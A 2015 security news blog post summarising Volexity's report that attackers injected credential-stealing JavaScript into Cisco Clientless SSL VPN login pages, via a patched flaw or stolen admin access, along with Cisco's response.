Hackers Backdooring Cisco WebVPN To Steal Customers’ Passwords

October 9, 2015 12:53 AM

Virtual Private Networks (VPNs), which is widely used by many businesses and organisations to provide secure access to their workers, are being abused to pilfer corporate user credentials.

Researchers from security firm Volexitydiscovered a new attack campaign that targets a widely used VPN product by Cisco Systems to install backdoors that collect employees’ usernames and passwords used to login to corporate networks.

The product in question is Cisco Systems’ Web-based VPN – Clientless SSL VPN.

Once an employee is authenticated, Clientless SSL VPNs allows him/her to access internal web resources, browse internal file shares, and launch plug-ins, which let them access internal web resources through telnet, SSH, or similar network protocols.

The backdoor contains malicious JavaScript code that attackers used to inject into the login pages. Once injected, the backdoor is hard to detect because the malicious JavaScript is hosted on an external compromised website and accessed only via secure HTTPS connections.

“Unfortunately, Volexity has found that [many] organizations are silently being victimized through this very login page,” Volexity wrote in a blog post published Wednesday. “This begs the question: How are the attackers managing to pull this off?

Methods to Install Backdoor

According to researchers, the backdoor is installed through two different entry points:

An exploit that relies on a critical flaw (CVE-2014-3393) in the Clientless SSL VPN that Cisco patched more than 12 months ago.Hackers gaining administrative access and using it to load the malicious code.

Infected Targets

Volexity observed this new campaign successfully infected the following organisations:

Medical Think TankUniversities, NGOs and Academic InstitutionsMultinational Electronics manufacturersNon-governmental organizations

In response to the issue, a Cisco spokesperson released a statement saying that the company is aware of the Volexity report and that it released the patches last year. 

Cisco customers can also protect themselves against such threats by following  Firewall best practices, the official added.

You can head on to Volexity official blog post, where the company has provided full technical details about the attack, along with suggestions for detecting and removing the VPN infections.

Be secure…
AncusH S. Gaikwad

Published by ancushgaikwad

#Researcher #Professional Certified Ethical  Hacker #Speaker #Blogger #Software Developer #Cyber Forensic Investigator #bug bounty #Robotics & More.

Leave a comment

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: